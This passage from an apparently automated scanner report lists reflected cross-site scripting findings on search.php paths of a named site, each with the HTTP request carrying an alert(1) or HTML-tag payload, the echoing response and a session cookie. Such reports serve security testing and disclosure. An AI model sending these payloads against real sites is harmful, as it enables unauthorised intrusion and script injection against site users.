This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2a52fd<a>319afd6050b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2a52fd<a>319afd6050b was not found on this server.</p>
...[SNIP]...

2.882. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 203f6<script>alert(1)</script>81bbccc3b53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail203f6<script>alert(1)</script>81bbccc3b53/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail203f6<script>alert(1)</script>81bbccc3b53/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.883. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 55e6d<script>alert(1)</script>803dc9499ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1055e6d<script>alert(1)</script>803dc9499ff/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1055e6d<script>alert(1)</script>803dc9499ff/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.884. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 55afd<script>alert(1)</script>5dae8cd5998 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes55afd<script>alert(1)</script>5dae8cd5998/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes55afd<script>alert(1)</script>5dae8cd5998/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.885. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16867<script>alert(1)</script>86b5f31cfb6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos16867<script>alert(1)</script>86b5f31cfb6/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos16867<script>alert(1)</script>86b5f31cfb6/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.886. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 55f77<script>alert(1)</script>57a6977e5d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images55f77<script>alert(1)</script>57a6977e5d6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images55f77<script>alert(1)</script>57a6977e5d6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.887. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f46e5<script>alert(1)</script>5a5fd95a62a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/search.phpf46e5<script>alert(1)</script>5a5fd95a62a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/search.phpf46e5<script>alert(1)</script>5a5fd95a62a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.888. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7d9be<a>c07426db939 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7d9be<a>c07426db939&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7d9be<a>c07426db939&opt=2 was not found on this server.</p>
...[SNIP]...

2.889. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 45012<a>5659271a0d6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/images/search.php?keyword=search...45012<a>5659271a0d6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/search.php?keyword=search...45012<a>5659271a0d6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.890. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6d2be<script>alert(1)</script>b74c7351535 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&6d2be<script>alert(1)</script>b74c7351535=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&6d2be<script>alert(1)</script>b74c7351535=1 was not found on this server.</p>
...[SNIP]...

2.891. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8e566<a>2ddb8add7b7 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=28e566<a>2ddb8add7b7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=28e566<a>2ddb8add7b7 was not found on this server.</p>
...[SNIP]...

2.892. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ed19<script>alert(1)</script>e9af58aad6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3ed19<script>alert(1)</script>e9af58aad6/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3ed19<script>alert(1)</script>e9af58aad6/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.893. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e02b8<script>alert(1)</script>d1c7da3797e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10e02b8<script>alert(1)</script>d1c7da3797e/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10e02b8<script>alert(1)</script>d1c7da3797e/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.894. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27b48<script>alert(1)</script>aefcd4d5c25 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes27b48<script>alert(1)</script>aefcd4d5c25/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes27b48<script>alert(1)</script>aefcd4d5c25/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.895. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f3750<script>alert(1)</script>96f19bf9b1a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmosf3750<script>alert(1)</script>96f19bf9b1a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmosf3750<script>alert(1)</script>96f19bf9b1a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.896. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2b1e5<script>alert(1)</script>44e92b28c52 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/search.php2b1e5<script>alert(1)</script>44e92b28c52?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/search.php2b1e5<script>alert(1)</script>44e92b28c52?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.897. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8b39c<a>f5344619da0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search8b39c<a>f5344619da0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search8b39c<a>f5344619da0&opt=2 was not found on this server.</p>
...[SNIP]...

2.898. http://www.resellerbase.com/detail/10/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b16b3<a>2213dd70319 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/search.php?keyword=search...b16b3<a>2213dd70319&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
